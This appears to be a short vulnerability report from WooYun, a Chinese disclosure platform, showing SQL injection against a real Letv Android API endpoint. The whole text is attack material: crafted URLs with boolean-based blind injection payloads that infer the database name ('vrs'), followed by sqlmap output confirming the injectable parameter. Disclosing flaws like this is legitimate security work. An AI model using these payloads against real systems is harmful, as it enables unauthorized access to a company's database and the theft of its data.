WooYun.org

http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103' and 1 = 1 and length((select DATABASE())) =3 and 'a' ='a&vtype=m3u8

http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103' and 1 = 1 and (select DATABASE()) ='vrs' and 'a' ='a&vtype=m3u8

sqlmap identified the following injection points with a total of 55 HTTP(s) requ
ests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://app.m.letv.com:80/android/mindex.phtml?version=3.3.0.1&pcode
=010110106&mod=minfo&ctl=video&act=index&id=80103' AND 4451=4451 AND 'XLVh'='XLV
h&vtype=m3u8
    Vector: AND [INFERENCE]
---